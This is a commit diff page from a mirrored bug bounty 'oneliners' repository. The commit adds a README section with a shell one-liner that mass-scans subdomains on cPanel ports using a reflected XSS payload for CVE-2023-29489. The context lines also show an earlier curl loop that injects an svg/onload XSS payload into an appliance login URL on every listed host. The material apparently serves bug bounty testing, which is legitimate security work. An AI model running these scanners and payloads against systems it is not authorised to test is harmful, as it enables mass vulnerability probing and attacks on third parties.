daffainfo
/
Oneliner-Bugbounty
mirror of https://github.com/daffainfo/Oneliner-Bugbounty.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update README.md

pull/1/head
AdrianMF 2023-04-28 11:15:33 +07:00 committed by GitHub
parent 241e21e8f3
commit c8c2c1ef25
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -18,3 +18,9 @@ subfinder -d site.com | httpx | waybackurls | grep -E ".json(?:onp?)?$"
```bash
cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done
```
### CVE-2023-29489
```bash
subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaa' -mc 400
```